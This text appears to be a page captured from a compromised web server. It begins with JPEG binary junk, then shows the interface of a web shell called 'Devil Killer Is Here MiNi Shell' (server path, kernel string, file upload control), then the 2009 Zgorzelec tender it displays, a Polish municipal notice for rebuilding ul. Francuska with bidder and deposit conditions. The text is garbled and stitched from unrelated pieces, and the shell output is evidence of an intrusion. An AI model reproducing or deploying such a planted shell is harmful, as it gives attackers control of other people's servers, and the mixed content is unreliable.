JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/2486-N-2009.html

<p class="kh_header"><b>Zgorzelec: Wykonanie przebudowy ul. Francuskiej w Zgorzelcu  (Modernizacja nawierzchni drogi i chodnika ul. Francuskiej)</b><br>
<b>Numer ogłoszenia: 2486 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przebudowy ul. Francuskiej w Zgorzelcu  (Modernizacja nawierzchni drogi i chodnika ul. Francuskiej).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest przebudowa nawierzchni jezdni  oraz chodnika z 
wydzieleniem ścieżki rowerowej w ulicy Francuskiej na odcinku od skrzyżowania z ulicą 
Rzeczki Dolne do skrzyżowania z ulicą Baczyńskiego.       
2.  Roboty obejmują również przebudowę nawierzchni skrzyżowań z włączonymi ulicami na ich wlotach w zakresie umożliwiającym wykonanie prawidłowych przejść dla pieszych oraz przejazdów dla rowerzystów tj. z ulicą: Rzeczki Dolne, Adama Mickiewicza, Świętego Jana, Baczyńskiego. 
3.  Roboty budowlane będą prowadzone na terenie następujących działek: 
- 121dr-AM2, 1dr AM3 obręb XI-miasto Zgorzelec; nr 10/1-AM2 obręb X - miasto 
Zgorzelec, oznaczone na mapie ewidencji gruntów w skali 1:1000. 
4.  Dla jezdni należy zastosować nawierzchnię  bitumiczną z betonu asfaltowego.
5.  Kostka kamienna  oraz krawężniki  kamienne są przewidziane do odzysku, w związku z tym  należy je składować nieodpłatnie w miejscu wskazanym przez Zamawiającego tj. wysypisko komunalne w Jędrzychowicach. 
6.  Przed wywiezieniem kostki kamiennej oraz krawężników kamiennych (przeznaczonych do odzysku) na wysypisko komunalne w Jędrzychowicach, należy dokonać segregacji (oddzielić kostkę od gruzu). 
7.  Materiał składowany na wysypisku komunalnym w Jędrzychowicach musi być w miejscu składowania zważony a czynność udokumentowana. 
8.  Zamawiający dopuszcza 1, 5% ubytek materiału przeznaczonego do odzysku.
9.  W przypadku ubytku powyżej 1,5 %, Wykonawca do terminu zakończenia realizacji 
inwestycji, uzupełni  brakującą ilość kostki kamiennej  i krawężników kamiennych (o 
niegorszych parametrach)  na koszt własny.
10.Chodnik na odcinku od ulicy Baczyńskiego do Św. Jana należy wykonać jako ciąg pieszo rowerowy o szerokości 2,50m, na dalszym odcinku, wydzielenie ścieżki rowerowej nastąpi z chodnika, bezpośrednio przy krawężniku. 
Szerokość ścieżki musi wynosić 2,00m, ma być  dwukierunkowa na odcinku od ulicy 
Św. Jana do ulicy Mickiewicza, dalej do ulicy Rzeczki Dolne o szerokości 2,25m. 
11.Nawierzchnię chodnika oraz ścieżki rowerowej należy wykonać z kostki brukowej 
betonowej. 
12.Dla ścieżki rowerowej należy zastosować kostkę brukową betonową w kolorze bordo.
13.Zamawiający wymaga zastosowanie dla ścieżki rowerowej kostki tzw. bez fazy. 
14.Betonowa kostka brukowa musi spełniać wymagania techniczne opisane w specyfikacji technicznej wykonania i odbioru robót. Zamawiający wymaga by betonowa kostka brukowa przeznaczona na ścieżkę  rowerową była gatunku 1. 
15.Wykonawca przed wbudowaniem betonowej kostki brukowej musi przedstawić aprobatę techniczną i atest zastosowanych materiałów budowlanych, w celu uzyskania akceptacji przez Inwestora  i Inspektora Nadzoru. 
16.Należy wykonać przebudowę  istniejących studzienek ściekowych na nowe wraz z 
czyszczeniem (płukaniem) przykanalików dla sprawnego odprowadzenia wód 
powierzchniowych z nawierzchni jezdni i chodników.
17.W przypadku trwałej niedrożności (załamania, zapadnięcia kanału) przykanalik należy przebudować. 
18.W jezdni należy zabudować włazy żeliwne typu D400.
19.Na wszystkich zjazdach indywidualnych na poszczególne posesje należy wykonać
nawierzchnię  z kostki betonowej brukowej, jak na chodnikach i ścieżce rowerowej. 
20.Zabudowę zjazdów w planie i profilu należy dostosować indywidualnie do sytuacji w terenie.
21.Na wszystkich przejściach dla pieszych oraz zjazdach krawężniki należy obniżyć:
- przejścia dla pieszych 0-2 cm, 
- zjazdy 4-6 cm od powierzchni nawierzchni jezdni, 
22.W przypadku przejazdu rowerowego wysokość krawężnika oraz innych progów i 
uskoków nie powinna przekraczać 1 cm. 
23.Wszelkie skrzynki zaworowe, nakrywy studni telekomunikacyjnych należy 
wyregulować w planie i profilu do nowych nawierzchni. 
24.Powierzchnia elementów podlegających przebudowie:
- jezdnia - 3627,00m2, 
- chodniki - 1664,00m2 
- zjazdy indywidualne - 249,00m2
25.Długość zabudowanych elementów liniowych:
- krawężnika - 1091,00 mb, 
- obrzeża 320,00 mb, 
- przykanaliki 65 mb, 
- studzienki ściekowe 21 szt. 
26.Konstrukcje nawierzchni winny zawierać następujące elementy:
1) jezdnia:
- warstwa ścieralna z betonu asfaltowego 0/12,8 mm grub. 5cm;
- warstwa wiążąca z betonu asfaltowego 0/20mm grub.  6cm; 
- warstwa podbudowy z kruszywa łamanego 0-63,5 stabilizowanego mechanicznie 
   grub. 25 cm;
- warstwa odsączająca z piasku średnioziarnistego grub. 15 cm;
- istniejące podłoże;
2) chodnik, ścieżka rowerowa: 
- kostka betonowa brukowa grub. 8 cm na podsypce piaskowej grub. 3 cm;
- podbudowa z kruszywa łamanego 0÷31,5 mm stabilizowanego mech., grub.
  10 cm;
- istniejące podłoże po korytowaniu, splantowane i zagęszczone;
3) zjazdy:
- kostka betonowa brukowa grub. 8 cm na podsypce piaskowej gr. 3 cm;
- podbudowa z kruszywa łamanego 0/31,5mm stabilizowanego mechanicznie, grub. 15
  cm; 
- podłoże po korytowaniu splantowane i zagęszczone.
27.Jezdnię należy obramować krawężnikiem betonowym o wymiarach 15x30 cm na ławie  betonowej z oporem z betonu C12/15 o Fb=0,07m2 .
28.Na zjazdach oraz przejściach dla pieszych i przejazdach rowerowych należy zastosować  krawężnik najazdowy 15x22cm.
29.Obramowanie chodnika od strony zewnętrznej należy wykonać z obrzeża betonowego 8x30 cm na ławie betonowej z betonu C12/15 o Fb=0,04m2  lub zabudować kostkę  brukową do podmurówki ogrodzenia.
30.Dla potrzeb zapewnienia wjazdu na posesję (do garażu) ul. Francuskiej nr 10 należy wykonać zabudowę palisady betonowej d=80cm, h=80cm, na ławie betonowej z oporem, z betonu C12/15, podtrzymującą nawierzchnię podjazdu. 
31.W ramach robót ziemnych należy wykonać korytowanie pod konstrukcję nawierzchni jezdni, chodnika, ścieżki rowerowej oraz zjazdów. Podczas korytowania należy rozebrać istniejącą podbudowę pod kostką kamienną oraz nawierzchnią bitumiczną w chodniku. 
Po wykonaniu robót nawierzchniowych pozostały teren gruntowy należy uporządkować poprzez :
- splantowanie, 
- uzupełnienie ziemią urodzajną, 
- posianie trawą.
32.Z powodu wydzielenia ścieżki rowerowej ulegnie zmianie oznakowanie przejść dla 
pieszych oraz przejazdów dla rowerzystów w rejonie skrzyżowań, które należy wykonać zgodnie z dokumentacją projektową i specyfikacją techniczną wykonania i odbioru robót.
33.Wykonawca w dniu wejścia na plac budowy musi przedłożyć Zamawiającemu 
tymczasowy projekt zmiany organizacji ruchu na czas trwania budowy, zaopiniowany 
przez  Wydział  Infrastruktury, Środowiska i  Spraw Mieszkaniowych tut. Urzędu oraz 
Wydział  Drogownictwa Starostwa Powiatowego w Zgorzelcu. 
34.Wykonanie przedmiotu zamówienia ujęto w załączonej do SIWZ specyfikacji 
technicznej  wykonania i odbioru robót, przedmiarze robót i dokumentacji projektowej w skład której  wchodzi:  
- opis techniczny 
- wyrysy z mapy ewidencji gruntów w skali 1:1000
- projekt zagospodarowania terenu, 
-  profil podłużny 
- przekrój poprzeczny-normalny A-A, 
- przekrój poprzeczny normalny B-B, 
- przekrój poprzeczny konstrukcyjny C-C, 
- przekrój poprzeczny normalny D-D. 
35.Roboty należy wykonać zgodnie z dokumentacją techniczną wykonania i odbioru robót stanowiącą załącznik nr 7 do SIWZ,  przedmiarem  robót i dokumentacją         
projektową. 
36.Zobowiązuje się Wykonawcę do wykonania inwentaryzacji geodezyjnej 
po zakończeniu  inwestycji, w  terminie jak najkrótszym. 
37.Przed przystąpieniem do w/w robót Wykonawca jest zobowiązany zapoznać się ze 
specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót  oraz dokonać 
wizji lokalnej terenu  budowy, by uzyskać istotne informacje, które mogą być konieczne do przygotowania oferty. Wizję lokalną dokona Wykonawca na własny koszt.
38.Wykonawca jako wytwarzający odpady jest zobowiązany do przestrzegania przepisów prawnych wynikających z następujących ustaw:
a/ Ustawy z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz.U.Nr 62, poz.627 z 
póź.zm.)       
b/ Ustawy z dnia 27.04.2001r. o odpadach (Dz.U. Nr 62, poz. 628 z póź zm.)
Zamówienie powyżej 14.000 euro a poniżej kwot określonych w art. 11 ust. 8 Pzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona  wadium w wysokości  21 000,00 zł. PLN (słownie: 
    dwadzieścia jeden tysięcy zł.)
2. Wadium musi obejmować okres związania ofertą.
    Uwaga! Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i 
    zobowiązania  Zamawiającego i Wykonawcy  dot. w/w ustaleń będą podlegały - 
    odpowiednio nowym terminom.
3. Termin wniesienia wadium upływa wraz z terminem składania ofert, o godzinie 
    wyznaczonej na składanie ofert.
4.Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na 
   przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu 
   związania ofertą  zostanie przez Zamawiającego wykluczony z ubiegania się o 
   udzielenie zamówienia   publicznego. 
5.W zależności od woli wykonawcy wadium może być wnoszone w formach:
    - pieniądzu,
    - poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
      kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    - gwarancjach bankowych,
    - gwarancjach ubezpieczeniowych,
    - poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 
      2 ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
      Przedsiębiorczości  (Dz.U. z 2007r. Nr 42, poz. 275)

UWAGA!Wadium wniesione w formie gwarancji bankowej lub ubezpieczeniowej, musi 
gwarantować Beneficjentowi zapłatę sumy gwarancyjnej jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo 
zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których 
mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, iż wynika to z 
przyczyn należących po jego stronie. 
6. Warunkiem uznania wniesienia wadium będzie załączony do oferty dokument
    potwierdzający wniesienie wadium do Zamawiającego.
7. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    zamawiającego Nr 35124012971111000025654013 w banku PEKAO S.A. I     
    O/Zgorzelec.
    Na przelewie należy  umieścić informację :
    Wadium na wykonanie  przebudowy ul. Francuskiej w Zgorzelcu
      (Modernizacja nawierzchni drogi i chodnika ul. Francuskiej)                 
8. Zamawiający zwraca wadium jeżeli:
    - upłynął termin związania ofertą 
    - zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
       należytego wykonania tej umowy 
    - zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty 
      zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
 9.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
    a/ który wycofał ofertę przed upływem terminu składania ofert,
    b/ który został wykluczony z postępowania,
    c/ którego oferta została odrzucona.
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym 
     zwrócono wadium na podstawie art.46 ust.2 pkt. 2 i 3 ustawy Pzp, jeżeli w wyniku 
     ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia  
     wykonawcy lub odrzucenia oferty. Wykonawcy wniosą wadium w terminie 
     określonym  przez   Zamawiającego
11.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
     wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
     pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
     za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi  
     na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów 
     lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba że 
     udowodni,  że wynika to z przyczyn niezależnych po jego stronie. 
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
    a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
        określonych w ofercie, 
    b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
    c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
        przyczyn   leżących  po stronie wykonawcy.
13.Wadium wybranego wykonawcy zostanie zwrócone niezwłocznie po wniesieniu
    wymaganego zabezpieczenia należytego wykonania umowy i zawarciu przez niego
    umowy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Warunki udziału w postępowaniu
1.1 O udzielenie Zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki 
udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp,  i nie podlegają   
wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz złożą dokumenty potwierdzające 
spełnienie  tych warunków.
W szczególności zamawiający wymaga, aby wykonawcy wykazali, że:
1/  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
     ustawy nakładają obowiązek posiadania takich uprawnień,
2/  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
     technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią 
     pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
     technicznego  i osób   zdolnych do wykonania zamówienia
3/  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
     zamówienia,  
4/  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
1.2 Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:
     Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie 
     załączonych do oferty dokumentów, o których mowa w pkt. 2  metodą  spełnia /  
     nie spełnia.
     Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane
     przez zamawiającego jako niespełnienie warunku, co będzie skutkować    
     wykluczeniem  wykonawcy z postępowania, z zastrzeżeniem art.  26 ust. 3 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2.Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy 
   w celu potwierdzenia spełnienia warunków udziału w postępowaniu, 
   zgodnie z  art. 24.ust. 1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień 
   publicznych i zgodnie z uregulowaniami  rozporządzenia  Prezesa Rady 
   Ministrów z dnia 19 maja 2006 r.  w sprawie rodzajów dokumentów, jakich może 
   żądać  zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być 
   składane (Dz. U. Nr 87, poz. 605),z uwzględnieniem  zmian wprowadzonych 
   rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008r. zmieniające 
   rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający 
   od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U.Nr  188, 
   poz. 1155) 
2.1W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1 
    podpunkt 1, Zamawiający żąda załączenia : 
    1/aktualnego  odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie 
       do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
       do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego 
       nie  wcześniej niż 6  miesięcy przed upływem terminu składania wniosków o 
       dopuszczenie  do udziału w   postępowaniu o udzielenie zamówienia albo 
       składania ofert (§ 1 ust.1,  pkt 2  rozporządzenia Prezesa Rady Ministrów z dnia 
       24 maja 2006r.  Dz.U. Nr 87,  poz. 605) .
       Za aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
       ewidencji działalności gospodarczej uznaje się zarówno dokument wystawiony 
       odpowiednio nie wcześniej  niż sześć m-cy przed upływem terminu składania 
       ofert, jak również dokument, wystawiony  w okresie wcześniejszym, jeżeli 
       istnienie określonych w  nim okoliczności potwierdzone   zostanie przez właściwy 
       organ w wymaganym terminie i  opatrzone urzędową adnotacją  potwierdzającą  
       jego aktualność.   
Uwaga! W przypadku składania oferty przez Wykonawców występujących 
           wspólnie,    w/w  dokument składa każdy z przedsiębiorców  tworzących
           konsorcjum.
   2/ zaświadczenia z Krajowego Rejestru Karnego
       a/  w zakresie określonym w art. 24 ust. 1 pkt  4-8   ustawy Pzp, wystawione 
            nie wcześniej niż  6 miesięcy przed  terminem składania  ofert, 
       b/ zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
           ust.1 pkt 9  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed 
           terminem składania ofert (§ 1  ust 1. pkt 4 i 5 rozporządzenia Prezesa Rady 
           Ministrów z dnia 24 maja 2006 r. Dz.U. Nr  87,  poz.   605) 
Uwaga! W przypadku składania oferty przez Wykonawców występujących wspólnie, 
           w/w  dokument składa każdy z przedsiębiorców  tworzących konsorcjum.
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczypospolitej   Polskiej, zamiast dokumentów, o których mowa w pkt. 2.1  
podpunkty   1 i 2b składa dokument lub dokumenty wystawione w kraju, w którym ma  
siedzibę  lub  miejsce  zamieszkania, potwierdzające  odpowiednio:
-  dla pkt. 2 .1 podpunkt 1,  że  nie otwarto jego likwidacji ani nie ogłoszono upadłości -  wystawione nie wcześniej   niż  6 miesięcy przed upływem terminu składania ofert, 
-  dla pkt. 2.1 podpunkt 2b, że nie orzeczono wobec niego zakazu ubiegania się o 
   zamówienie, wystawione nie  wcześniej niż 6  miesięcy przed upływem terminu 
   składania ofert. 
W zakresie dokumentu określonego w pkt. 2.1 podpunkt 2a Wykonawca składa   
zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się wyżej wymienionych dokumentów, zastępuje się
je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym 
organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
Wykonawca   ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6   
miesięcy  przed upływem terminu składania ofert.
2.2 W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1
      podpunkt 2,  Zamawiający żąda:
1/ wykazu  czterech  wykonanych (zakończonych) robót budowlanych w 
    okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie 
    zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
    odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym 
    przedmiot  zamówienia,  wraz z podaniem  daty  i miejsca     wykonania  oraz  
    załączeniem  dokumentów   potwierdzających,  że roboty te zostały   wykonane   
    należycie   -  wg załącznika  nr 4   do SIWZ
    Zamawiający wymaga, aby  wykaz zawierał: 
    - dwie wykonane roboty budowlane stanowiące przedmiot zamówienia tj. 
      wykonanie nawierzchni z betonowej kostki  brukowej o wartości nie mniejszej 
      niż  300 000,00 zł. każda, 
    - dwie wykonane  roboty budowlane stanowiące przedmiot zamówienia tj. 
       wykonanie nawierzchni asfaltowych  o wartości nie mniejszej niż 
       300 000,00zł. każda. 
2/-dołączenia wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu 
    zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
    doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także 
    zakresu  wykonywanych przez nich  czynności. 
    Zamawiający wymaga, aby minimum 1 osoba, która będzie wykonywać zamówienie 
    posiadała  prawo  wykonywania  samodzielnych funkcji technicznych w 
    budownictwie do kierowania robotami budowlanymi w specjalności drogowej co 
    najmniej w ograniczonym zakresie, wpisaną na listę członków  samorządu 
    zawodowego -  Okręgowej Izby Inżynierów.         
    W celu potwierdzenia tego warunku należy przedstawić dokument potwierdzający 
    uprawnienia kierownika budowy wraz z aktualnym zaświadczeniem z właściwego 
    oddziału Okręgowej Izby Inżynierów  Budownictwa potwierdzającym przynależność 
    do tej izby na   dzień składania  ofert - załącznik nr 5
Uwaga!W przypadku składania oferty przez Wykonawców występujących 
          wspólnie, w/w  warunek, musi spełnić co najmniej jeden z          
          przedsiębiorców. 
      3/ dołączenia pisemnego zobowiązania innych podmiotów do udostępnienia osób 
          zdolnych  do wykonania  zamówienia, jeżeli w wykazie  o którym mowa w pkt. 
          2.2 podpunkt 2 Wykonawca wskazał osoby, którymi będzie dysponował. 
2.3 W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1
      podpunkt 3, Zamawiający żąda:   
      1/polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że 
         wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
         prowadzonej działalności.  
Uwaga! Uwaga! W przypadku składania oferty przez Wykonawców występujących 
           wspólnie, w/w  warunek, musi spełnić co najmniej jeden z przedsiębiorców 
2.4 W celu potwierdzenia, warunków udziału w postępowaniu określonych  w pkt. 1.1
       Zamawiający żąda:
       1/ oświadczenia Wykonawcy, o spełnieniu warunków udziału w postępowaniu 
           zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu z art. 24 ust. 1 i 2 
